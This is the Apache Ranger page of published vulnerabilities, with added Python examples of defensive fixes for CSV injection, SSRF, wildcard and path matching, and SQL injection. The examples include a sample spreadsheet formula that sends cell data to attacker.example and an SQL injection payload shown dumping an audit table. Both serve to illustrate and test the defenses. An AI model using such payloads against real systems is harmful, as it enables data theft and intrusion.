Vulnerabilities Found
Introduction
This page contains a list of security vulnerabilities that have been found in Apache Ranger. For each vulnerability, the following information is provided:
Fixed in Ranger 2.6.0
| CVE-2024-55532 | Improper Neutralization of Formula Elements in a CSV File in Export to CSV feature of Apache Ranger |
|---|---|
| Severity | Low |
| Vendor | The Apache Software Foundation |
| Versions Affected | Apache Ranger versions prior to 2.6.0 |
| Users affected | All users of the Ranger policy admin tool |
| Description | Improper neutralization of formula elements (CSV injection) in the Export to CSV functionality: cell content beginning with a formula trigger such as `=` was written to the exported file verbatim, so a spreadsheet application opening the file could evaluate it as a formula |
| Fix detail | Added logic to properly sanitize the exported content |
| Mitigation | Users should upgrade to 2.6.0 or a later version of Apache Ranger with the fix |
| Credit | 김도균 (a2256014@naver.com) |
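The check a CSV exporter needs for this class of issue, as an added Python illustration (not Ranger's own Java fix, whose exact details the advisory does not give): any cell whose first non-blank character is one of the spreadsheet formula triggers gets a leading apostrophe, and every cell is quoted so that delimiters and newlines cannot break row structure either. The sample policy rows and the `SAMPLE_POLICIES` name are constructed for the example.

```python
import csv
import io

# Leading characters that make common spreadsheet applications evaluate a
# cell as a formula. Tab and carriage return are included because some
# importers strip them and then act on the character that follows.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value):
    """Disarm a single CSV cell for safe opening in a spreadsheet.

    A cell whose first non-blank character is a formula trigger gets a
    leading apostrophe, which spreadsheets treat as "this is text".
    Everything else is returned unchanged.
    """
    text = "" if value is None else str(value)
    if text.lstrip(" ").startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def export_rows_to_csv(rows):
    """Serialise rows (lists of cells) to CSV text with every cell neutralized.

    QUOTE_ALL wraps each cell in double quotes, so embedded commas, quotes
    and newlines cannot break the row structure.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()


# Constructed sample: a policy whose name was chosen to smuggle a formula
# into the exported file. Names and resource paths are illustrative only.
SAMPLE_POLICIES = [
    ["Policy Name", "Resource", "Users"],
    ["finance_read", "/data/finance", "alice"],
    ['=HYPERLINK("https://attacker.example/?d="&A2;"open")', "/tmp", "mallory"],
    ["-1+1", "/data/negative_looking_name", "bob"],
]

if __name__ == "__main__":
    print(export_rows_to_csv(SAMPLE_POLICIES))
```

One caveat: the apostrophe prefix also lands on legitimate values such as `-5`, so apply it to free-text columns (names, descriptions, resource paths) and leave numeric columns to a numeric serializer.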
Fixed in Ranger 2.5.0
| CVE-2024-45478 | Stored XSS vulnerability in Edit Service Page of Apache Ranger UI |
|---|---|
| Severity | Moderate |
| Vendor | The Apache Software Foundation |
| Versions Affected | Apache Ranger versions prior to 2.5.0 |
| Users affected | All users of the Ranger policy admin tool UI |
| Description | Apache Ranger was found to be vulnerable to a stored XSS issue in the Edit Service functionality |
| Fix detail | Added logic to validate the user input |
| Mitigation | Users should upgrade to 2.5.0 or a later version of Apache Ranger with the fix |
| Credit | Gyujin |
| CVE-2024-45479 | SSRF vulnerability in Edit Service Page of Apache Ranger UI |
|---|---|
| Severity | Moderate |
| Vendor | The Apache Software Foundation |
| Versions Affected | Apache Ranger versions prior to 2.5.0 |
| Users affected | All users of the Ranger policy admin tool UI |
| Description | Apache Ranger was found to be vulnerable to an SSRF issue in the Edit Service functionality |
| Fix detail | Added logic to validate the user input |
| Mitigation | Users should upgrade to 2.5.0 or a later version of Apache Ranger with the fix |
| Credit | Gyujin |
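The advisory says only that user input on the Edit Service page is now validated. As an added Python example (not Ranger's code; the project's actual validation logic is not described on this page), the pattern a policy admin server needs before it connects to a user-supplied service URL: an operator-managed hostname allowlist, a scheme allowlist, no embedded credentials, and a check of every address the host resolves to so that a name pointing at loopback or the link-local metadata range is refused. RFC 1918 space is deliberately not blocked, because the Hive, HDFS or HBase endpoints a Ranger service definition points at normally live there. `SAMPLE_DNS` and `sample_resolve` are a constructed resolver for offline use; `validate_outbound_url` and `url_is_allowed` are this example's own names.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def resolve_host(host):
    """Return the set of IP address strings a hostname resolves to (real DNS)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_forbidden_address(ip_text):
    """Addresses a service-definition URL must never reach: loopback,
    link-local (which includes the 169.254.169.254 cloud metadata endpoint),
    multicast and unspecified. The allowlist, not an IP range, decides which
    internal hosts are reachable."""
    addr = ipaddress.ip_address(ip_text)
    return addr.is_loopback or addr.is_link_local or addr.is_multicast or addr.is_unspecified


def validate_outbound_url(url, allowed_hosts, resolve=resolve_host):
    """Validate a user-supplied URL before the server connects to it.

    allowed_hosts: lower-case hostnames the operator has approved.
    Returns the hostname on success, raises ValueError otherwise.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise ValueError("scheme not allowed: %r" % parts.scheme)
    if parts.username is not None or parts.password is not None:
        # "http://trusted.example@attacker.example/" parses the trusted name
        # as userinfo and the attacker as host; refuse the form outright.
        raise ValueError("credentials in URL are not allowed")
    host = parts.hostname
    if not host:
        raise ValueError("URL has no host")
    if host not in allowed_hosts:
        raise ValueError("host not in allowlist: %r" % host)
    # Literal IPs skip DNS; hostnames are resolved and every returned
    # address is checked, so a name that points (or is later rebound) to
    # loopback or the metadata endpoint is still rejected.
    try:
        addresses = {str(ipaddress.ip_address(host))}
    except ValueError:
        addresses = set(resolve(host))
    if not addresses:
        raise ValueError("host does not resolve: %r" % host)
    for ip_text in addresses:
        if is_forbidden_address(ip_text):
            raise ValueError("host resolves to forbidden address %s" % ip_text)
    return host


def url_is_allowed(url, allowed_hosts, resolve=resolve_host):
    """Boolean convenience wrapper around validate_outbound_url."""
    try:
        validate_outbound_url(url, allowed_hosts, resolve)
    except ValueError:
        return False
    return True


# Constructed resolver and allowlist so the example runs offline.
SAMPLE_DNS = {
    "hive.corp.example": ["10.0.0.5"],
    "rebound.corp.example": ["10.0.0.6", "127.0.0.1"],
}
SAMPLE_ALLOWLIST = {"hive.corp.example", "rebound.corp.example"}


def sample_resolve(host):
    return SAMPLE_DNS.get(host, [])
```

Two points the code cannot enforce on its own: the connection that follows should be made to the address that was just validated (pin it, or re-validate on every redirect), otherwise a second DNS answer or a 302 to `http://169.254.169.254/` undoes the check; and decimal or octal IP spellings such as `http://2130706433/` are treated as hostnames by `ipaddress` and would be handed to the resolver, which is why the allowlist check runs first.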
Fixed in Ranger 2.0.0
| CVE-2019-12397 | Apache Ranger cross site scripting issue |
|---|---|
| Vendor | The Apache Software Foundation |
| Versions Affected | Apache Ranger 0.7.0 through 1.2.0 (all versions prior to 2.0.0) |
| Users affected | All users of the Ranger policy admin tool |
| Description | Apache Ranger was found to be vulnerable to cross-site scripting in the policy import functionality |
| Fix detail | Added logic to sanitize the user input |
| Mitigation | Users should upgrade to 2.0.0 or a later version of Apache Ranger with the fix |
| Credit | Jan Kaszycki from STM Solutions |
Fixed in Ranger 1.2.0
| CVE-2018-11778 | Apache Ranger stack-based buffer overflow |
|---|---|
| Severity | Critical |
| Vendor | The Apache Software Foundation |
| Versions Affected | Apache Ranger versions prior to 1.2.0 |
| Users affected | Unix Authentication Service users |
| Description | Apache Ranger UnixAuthenticationService did not properly handle user input, allowing a stack-based buffer overflow |
| Fix detail | UnixAuthenticationService was updated to correctly handle user input |
| Mitigation | Users should upgrade to 1.2.0 or a later version of Apache Ranger with the fix |
| Credit | Alexander Klink |
Fixed in Ranger 0.7.1
| CVE-2017-7676 | Apache Ranger policy evaluation ignores characters after '*' wildcard character |
|---|---|
| Severity | Critical |
| Vendor | The Apache Software Foundation |
| Versions Affected | 0.6.x/0.7.0 versions of Apache Ranger |
| Users affected | Environments that use Ranger policies with characters after the '*' wildcard character, such as my*test or test*.txt |
| Description | The policy resource matcher effectively ignores characters after the '*' wildcard character, so a pattern such as my*test behaves like my*. This can cause affected policies to apply to resources they should not apply to |
| Fix detail | Ranger policy resource matcher was updated to correctly handle wildcard matches. |
| Mitigation | Users should upgrade to 0.7.1 or a later version of Apache Ranger with the fix |
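Why this was rated critical is easiest to see by running both behaviours side by side. The block below is an added Python example, not Ranger's matcher: `wildcard_match_buggy` reproduces the failure mode the advisory describes (everything after the first '*' is dropped, leaving a prefix match), `wildcard_match` is a correct anchored matcher for Ranger-style patterns ('*' any run of characters, '?' one character), and `resources_matched` shows which of a constructed set of table names each one would grant a policy over. The '?' handling goes slightly beyond the advisory, which mentions only '*'.

```python
import re


def wildcard_match_buggy(pattern, value):
    """Illustration of the failure mode in the advisory: the matcher stops at
    the first '*' and prefix-matches, so 'my*test' behaves like 'my*'.
    Constructed for this example, not the original Ranger code."""
    prefix = pattern.split("*", 1)[0]
    return value.startswith(prefix)


def wildcard_to_regex(pattern):
    """Compile a wildcard pattern ('*' = any run of characters, '?' = one
    character) into an anchored regular expression. re.escape first, so
    dots and brackets in table or file names stay literal."""
    escaped = re.escape(pattern).replace(r"\*", ".*").replace(r"\?", ".")
    return re.compile("^" + escaped + "$", re.DOTALL)


def wildcard_match(pattern, value):
    """Correct behaviour: every character of the pattern, including those
    after a '*', must be accounted for by the value."""
    return wildcard_to_regex(pattern).match(value) is not None


def resources_matched(pattern, resources, matcher=wildcard_match):
    """Return the resources a policy with the given pattern would apply to."""
    return [r for r in resources if matcher(pattern, r)]


# Constructed sample resource names (e.g. Hive table names in one database).
SAMPLE_TABLES = ["my_test", "myfile", "my_unit_test", "test1.txt", "test.log", "mytest"]

if __name__ == "__main__":
    for name, matcher in (("buggy", wildcard_match_buggy), ("fixed", wildcard_match)):
        print(name, "my*test ->", resources_matched("my*test", SAMPLE_TABLES, matcher))
```

The practical check after upgrading: list every policy whose resource value has characters after a '*' (the `my*test` / `test*.txt` shape the advisory names) and confirm, with the fixed matcher, that the set of resources it now covers is the set you intended, since the buggy engine had been silently granting access to the wider `my*` set.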
| CVE-2017-7677 | Apache Ranger Hive Authorizer should check for RWX permission when external location is specified |
|---|---|
| Severity | Critical |
| Vendor | The Apache Software Foundation |
| Versions Affected | 0.5.x/0.6.x/0.7.0 versions of Apache Ranger |
| Users affected | Environments that use an external location for Hive tables |
| Description | The Ranger Hive Authorizer did not check RWX permission on the external location when one was specified, so a user could create a table over an external location without holding the required permissions on that location |
| Fix detail | Ranger Hive Authorizer was updated to correctly handle the permission check when an external location is specified |
| Mitigation | Users should upgrade to 0.7.1 or a later version of Apache Ranger with the fix |
Fixed in Ranger 0.6.3
| CVE-2016-8746 | Apache Ranger path matching issue in policy evaluation |
|---|---|
| Severity | Normal |
| Vendor | The Apache Software Foundation |
| Versions Affected | 0.6.0/0.6.1/0.6.2 versions of Apache Ranger |
| Users affected | All users of the Ranger policy admin tool |
| Description | The Ranger policy engine incorrectly matches paths in certain conditions when the policy does not contain wildcards and has the recursion flag set to true |
| Fix detail | Fixed policy evaluation logic |
| Mitigation | Users should upgrade to 0.6.3 or a later version of Apache Ranger with the fix |
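The advisory does not say which condition triggers the mismatch, so the block below does not claim to reproduce Ranger's defect. It is an added Python example of the semantics a recursive, wildcard-free path policy must have (the path itself plus its descendants, with a separator boundary after the policy path and with `.` / `..` / duplicate-slash normalization applied first), next to the classic string-prefix mistake that this class of bug tends to come down to; `path_matches_buggy`, `path_matches` and `normalize` are this example's own names.

```python
import posixpath
import re


def normalize(path):
    """Collapse '.', '..' and repeated separators. The result is absolute,
    has exactly one leading slash and no trailing slash (except for '/').
    posixpath.normpath keeps exactly two leading slashes, hence the re.sub."""
    norm = posixpath.normpath("/" + path)
    return re.sub(r"^/+", "/", norm)


def path_matches_buggy(policy_path, request_path, recursive):
    """Boundary mistake this class of bug comes down to: a recursive policy
    is treated as a plain string prefix, so '/data/finance' also covers
    '/data/finance2'. Constructed for illustration, not Ranger's code."""
    policy, request = normalize(policy_path), normalize(request_path)
    if request == policy:
        return True
    return recursive and request.startswith(policy)


def path_matches(policy_path, request_path, recursive):
    """Correct semantics: a non-recursive policy covers exactly its path; a
    recursive one also covers descendants, i.e. paths that continue with a
    separator right after the policy path."""
    policy, request = normalize(policy_path), normalize(request_path)
    if request == policy:
        return True
    if not recursive:
        return False
    if policy == "/":
        return True
    return request.startswith(policy + "/")


if __name__ == "__main__":
    for req in ("/data/finance/2016/q1.csv", "/data/finance2/secret.csv"):
        print(req, "buggy:", path_matches_buggy("/data/finance", req, True),
              "fixed:", path_matches("/data/finance", req, True))
```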
| CVE-2016-8751 | Apache Ranger stored cross site scripting issue |
|---|---|
| Severity | Normal |
| Vendor | The Apache Software Foundation |
| Versions Affected | 0.5.x and 0.6.0/0.6.1/0.6.2 versions of Apache Ranger |
| Users affected | All users of the Ranger policy admin tool |
| Description | Apache Ranger was found to be vulnerable to stored cross-site scripting when entering custom policy conditions. Admin users can store arbitrary JavaScript code that is executed when normal users log in and access policies |
| Fix detail | Added logic to sanitize the user input |
| Mitigation | Users should upgrade to 0.6.3 or a later version of Apache Ranger with the fix |
Fixed in Ranger 0.6.2
| CVE-2016-6815 | Apache Ranger user privilege vulnerability |
|---|---|
| Severity | Normal |
| Vendor | The Apache Software Foundation |
| Versions Affected | All 0.5.x versions and 0.6.0/0.6.1 versions of Apache Ranger |
| Users affected | All users of the Ranger policy admin tool |
| Description | Users with the "keyadmin" role were able to change the password of users with the admin role; "keyadmin" users should not be allowed to do so |
| Fix detail | Added logic to validate the user privilege in the backend |
| Mitigation | Users should upgrade to 0.6.2 or a later version of Apache Ranger with the fix |
Fixed in Ranger 0.6.1
| CVE-2016-5395 | Apache Ranger stored cross site scripting vulnerability |
|---|---|
| Severity | Normal |
| Vendor | The Apache Software Foundation |
| Versions Affected | All 0.5.x versions of Apache Ranger and version 0.6.0 |
| Users affected | All users of the Ranger policy admin tool |
| Description | Apache Ranger was found to be vulnerable to stored cross-site scripting in the create user functionality. Admin users can store arbitrary JavaScript code that is executed when normal users log in and access policies |
| Fix detail | Added logic to sanitize the user input |
| Mitigation | Users should upgrade to 0.6.1 or a later version of Apache Ranger with the fix |
| Credit | Thanks to Victor Hora from Securus Global for reporting this issue |
Fixed in Ranger 0.5.3
| CVE-2016-2174 | Apache Ranger SQL injection vulnerability |
|---|---|
| Severity | Normal |
| Vendor | The Apache Software Foundation |
| Versions Affected | Apache Ranger 0.5.0 up to, but not including, 0.5.3 |
| Users affected | All admin users of the Ranger policy admin tool |
| Description | SQL injection vulnerability in the Audit > Access tab. When the user clicks an element in the policyId column of the list, a request is made underneath whose eventTime parameter contains the vulnerability. Admin users can send arbitrary SQL to be executed along with the eventTime parameter via the /service/plugins/policies/eventTime URL |
| Fix detail | Replaced native queries with JPA named queries |
| Mitigation | Users should upgrade to the 0.5.3 version of Apache Ranger with the fix |
| Credit | Thanks to Mateusz Olejarka from SecuRing for reporting this issue |
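What "replaced native queries with JPA named queries" buys is that the `eventTime` value is bound as a parameter instead of being spliced into SQL text. The block below is an added Python/sqlite3 illustration of that difference, not Ranger's Java code or schema: `audits_by_event_time_vulnerable` builds the query by string formatting, `audits_by_event_time_safe` binds the value, and `INJECTED_EVENT_TIME` is a constructed payload of the kind the advisory describes. The `access_audit` table and its rows are made up for the example.

```python
import sqlite3

# Constructed audit rows: (id, policy_id, event_time, resource). The table
# and column names are illustrative, not Ranger's schema.
SAMPLE_AUDITS = [
    (1, 10, "2016-03-01 10:00:00", "/data/finance/q1.csv"),
    (2, 10, "2016-03-01 10:05:00", "/data/finance/q2.csv"),
    (3, 11, "2016-03-02 09:00:00", "/data/hr/salaries.csv"),
]


def make_audit_db():
    """In-memory database seeded with the sample audit rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE access_audit (id INTEGER PRIMARY KEY, policy_id INTEGER, "
        "event_time TEXT, resource TEXT)"
    )
    conn.executemany("INSERT INTO access_audit VALUES (?, ?, ?, ?)", SAMPLE_AUDITS)
    return conn


def audits_by_event_time_vulnerable(conn, event_time):
    """String concatenation: the parameter becomes part of the SQL text, so a
    quote in it ends the literal and the rest is parsed as SQL."""
    sql = "SELECT id, resource FROM access_audit WHERE event_time = '%s'" % event_time
    return conn.execute(sql).fetchall()


def audits_by_event_time_safe(conn, event_time):
    """Bound parameter: the value travels separately from the statement and
    is never parsed as SQL. A JPA named query with a :eventTime parameter
    gives the same property."""
    sql = "SELECT id, resource FROM access_audit WHERE event_time = ?"
    return conn.execute(sql, (event_time,)).fetchall()


# Constructed payload: closes the string literal and appends an always-true
# condition, which is enough to dump the whole table through the first query.
INJECTED_EVENT_TIME = "2016-03-01 10:00:00' OR '1'='1"

if __name__ == "__main__":
    db = make_audit_db()
    print("vulnerable:", audits_by_event_time_vulnerable(db, INJECTED_EVENT_TIME))
    print("safe:      ", audits_by_event_time_safe(db, INJECTED_EVENT_TIME))
```

With the injected value the vulnerable query returns every audit row while the parameterized one returns nothing, because no row has that literal string as its event time. The same idea applies to the audit log: a search for `event_time = '` in request parameters hitting `/service/plugins/policies/eventTime` on a pre-0.5.3 instance is a reasonable detection hint.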
Fixed in Ranger 0.5.1
| CVE-2015-5167 | Restrict REST API data access for non-admin users |
|---|---|
| Severity | Important |
| Vendor | The Apache Software Foundation |
| Versions Affected | 0.4.0 and 0.5.0 versions of Apache Ranger |
| Users affected | All users of the Ranger policy admin tool |
| Description | Data access restrictions via the REST API are not consistent with the restrictions in the policy admin UI |
| Mitigation | Users should upgrade to Ranger version 0.5.1 |
| CVE-2016-0733 | Ranger Admin authentication issue |
|---|---|
| Severity | Important |
| Vendor | The Apache Software Foundation |
| Versions Affected | 0.4.0 and 0.5.0 versions of Apache Ranger |
| Users affected | All users of the Ranger policy admin tool |
| Description | Malicious users can gain access to the Ranger admin UI without proper authentication |
| Mitigation | Users should upgrade to Ranger version 0.5.1 |
Fixed in Ranger 0.5.0
| CVE-2015-0265 | Apache Ranger code injection vulnerability |
|---|---|
| Severity | Important |
| Vendor | The Apache Software Foundation |
| Versions Affected | 0.4.0 version of Apache Ranger |
| Users affected | All admin users of the Ranger policy admin tool |
| Description | Unauthorized users can send JavaScript code to be executed in Ranger policy admin tool admin sessions |
| Fix detail | Added logic to sanitize the user input |
| Mitigation | Users should upgrade to 0.5.0 or a later version of Apache Ranger with the fix |
| Credit | Thanks to Jakub Kałużny from SecuRing for reporting this issue |
| CVE-2015-0266 | Apache Ranger direct URL access vulnerability |
|---|---|
| Severity | Important |
| Vendor | The Apache Software Foundation |
| Versions Affected | 0.4.0 version of Apache Ranger |
| Users affected | All users of the Ranger policy admin tool |
| Description | Regular users can type in the URL of modules that are accessible only to admin users |
| Fix detail | Added logic in the backend to verify user access |
| Mitigation | Users should upgrade to 0.5.0 or a later version of Apache Ranger with the fix |
| Credit | Thanks to Jakub Kałużny from SecuRing for reporting this issue |